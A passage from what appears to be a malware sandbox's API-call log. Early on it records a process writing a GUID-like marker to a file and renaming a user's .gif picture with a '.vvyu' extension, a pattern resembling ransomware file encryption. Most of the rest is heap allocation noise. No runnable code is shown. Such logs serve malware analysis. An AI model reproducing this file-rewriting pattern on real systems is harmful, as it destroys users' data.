hHeap=0x6a0000) returned 1 [0193.075] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.076] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.076] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.076] CloseHandle (hObject=0x584) returned 1 [0193.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0193.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d47778 [0193.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0193.078] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\_yDMBp0zwbtzU.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\7q5_45ijmfp9ba\\_ydmbp0zwbtzu.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\_yDMBp0zwbtzU.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\7q5_45ijmfp9ba\\_ydmbp0zwbtzu.gif.vvyu")) returned 1 [0193.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47778 | out: hHeap=0x6a0000) returned 1 [0193.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.079] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0193.082] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5712430, ftCreationTime.dwHighDateTime=0x1d89f0e, ftLastAccessTime.dwLowDateTime=0x4587f780, ftLastAccessTime.dwHighDateTime=0x1d89f23, ftLastWriteTime.dwLowDateTime=0x4587f780, ftLastWriteTime.dwHighDateTime=0x1d89f23, nFileSizeHigh=0x0, nFileSizeLow=0xce4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_yDMBp0zwbtzU.gif", cAlternateFileName="_YDMBP~1.GIF")) returned 0 [0193.082] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0193.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0193.083] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0193.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0193.083] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0193.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0193.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0193.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.123] HeapFree (in: hHeap=0x6a0000, 